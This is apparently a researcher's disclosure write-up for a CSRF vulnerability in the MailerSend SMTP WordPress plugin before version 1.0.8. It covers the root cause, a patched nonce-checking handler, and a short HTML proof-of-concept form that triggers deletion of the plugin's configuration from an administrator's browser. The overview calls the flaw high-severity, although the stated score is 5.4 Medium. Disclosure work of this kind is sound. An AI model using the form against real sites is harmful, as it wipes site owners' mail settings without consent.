Deep-Dive Technical Write-up by Huynh Kien Minh: CVE-2026-13156 — MailerSend WordPress Plugin CSRF Settings Deletion
🔐 Vulnerability ID:
CVE-2026-13156
🎯 CVSS Score:5.4 Medium
🏆 Discoverer: Huynh Kien Minh (MinhHK)
🔗 WPScan Advisory: Verified Report
🐙 GitHub Repository: MinhHK68/CVE-2026-13156
📖 Advisory Overview
CVE-2026-13156 is a high-severity Cross-Site Request Forgery (CSRF) vulnerability discovered in the official MailerSend SMTP Integration WordPress plugin prior to version 1.0.8, analyzed and disclosed by cybersecurity researcher Huynh Kien Minh (MinhHK). The configuration deletion function mailersend_handle_configuration_delete() verifies administrative capabilities (manage_options) but completely omits WordPress Nonce verification (check_admin_referer()). An attacker can craft a malicious cross-origin request targeting an authenticated WordPress Administrator to silently wipe stored SMTP credentials and force plugin deactivation, resulting in total Application Denial of Service across all email workflows.
Quick Links: Explore the official GitHub PoC Repository or visit the researcher's Security Portfolio.
📌 Executive Summary & Vulnerability Overview
| Parameter | Technical Specification |
|---|---|
| Vulnerability Identifier | CVE-2026-13156 |
| Target Software | MailerSend – Official SMTP Integration (WordPress Plugin) |
| Plugin Slug | mailersend |
| Vulnerable Versions | < 1.0.8 |
| Vulnerability Class | Cross-Site Request Forgery (CSRF) — CWE-352 |
| CVSS v3.1 Score |
5.4 (Medium) (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) |
| Discoverer / Researcher | Huynh Kien Minh (MinhHK) |
| Verification Authority | WPScan / MITRE Corporation |
| WPScan Advisory Reference | WPScan Report 595e653d-0904-43cf-8e61-d684599de11b |
| Researcher Portfolio | https://minhhk.web.app/ |
🔍 Deep-Dive Technical Breakdown & Root Cause Analysis
Missing Nonce Verification Vulnerability
The MailerSend Official SMTP Integration plugin for WordPress (before version 1.0.8) registers an administrative action (configuration-delete) intended to wipe stored API tokens, clear SMTP configuration options (wp_options), and deactivate the plugin when triggered from the admin dashboard.
While the endpoint verifies whether the active user has the manage_options capability (ensuring the request originates from an administrator session), it fails to perform WordPress nonce (check_admin_referer() or wp_verify_nonce()) verification.
Because HTTP requests lacking nonce validation cannot distinguish between intentional administrator clicks and forged cross-origin requests, any external site loaded by an authenticated administrator can silently trigger the configuration-delete action.
💻 Proof-of-Concept (PoC) Exploit Code
Ethical Disclaimer: Provided strictly for educational research, defensive verification, and security auditing under ethical disclosure protocols by Huynh Kien Minh.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>CVE-2026-13156 PoC — MailerSend SMTP Configuration Deletion via CSRF</title>
</head>
<body>
<h2>CVE-2026-13156 — CSRF Verification PoC by Huynh Kien Minh</h2>
<p>If an authenticated WordPress Administrator visits this page, MailerSend SMTP configuration will be deleted.</p>
<form id="csrfPoC" action="http://target-wordpress-site.local/wp-admin/admin.php" method="GET">
<input type="hidden" name="page" value="mailersend-smtp" />
<input type="hidden" name="action" value="configuration-delete" />
<input type="submit" value="Execute PoC" />
</form>
</body>
</html>
🛡️ Remediation & Patch Analysis
Upgrade MailerSend SMTP Integration to version 1.0.8 or higher.
// Secure Implementation (Version 1.0.8+)
function mailersend_delete_configuration_handler() {
if ( ! current_user_can( 'manage_options' ) ) {
wp_die( __( 'Unauthorized access.', 'mailersend' ), 403 );
}
// REQUIRED: Verify CSRF Nonce Token
if ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( $_GET['_wpnonce'], 'mailersend_delete_config_nonce' ) ) {
wp_die( __( 'Security check failed (CSRF attempt blocked).', 'mailersend' ), 403 );
}
delete_option( 'mailersend_smtp_settings' );
deactivate_plugins( plugin_basename( __FILE__ ) );
wp_redirect( admin_url( 'plugins.php?deactivated=true' ) );
exit;
}
🏆 About the Researcher
Huynh Kien Minh (MinhHK) is an Information Security Researcher specializing in WordPress vulnerability analysis, web application security auditing, and ethical exploit development.
- Cybersecurity Portfolio: https://minhhk.web.app/
- WPScan Reference: WPScan Advisory 595e653d-0904-43cf-8e61-d684599de11b
- GitHub Profile: https://github.com/MinhHK68
📊 JSON-LD Schema Markup
{
"@context": "https://schema.org",
"@type": "TechArticle",
"headline": "Deep-Dive Technical Write-up by Huynh Kien Minh: CVE-2026-13156 — MailerSend WordPress Plugin CSRF Settings Deletion",
"author": {
"@type": "Person",
"name": "Huynh Kien Minh",
"url": "https://minhhk.web.app/"
},
"datePublished": "2026-08-01",
"description": "Technical security advisory by Huynh Kien Minh analyzing CVE-2026-13156 in MailerSend SMTP Integration WordPress plugin.",
"identifier": "CVE-2026-13156"
}

Top comments (0)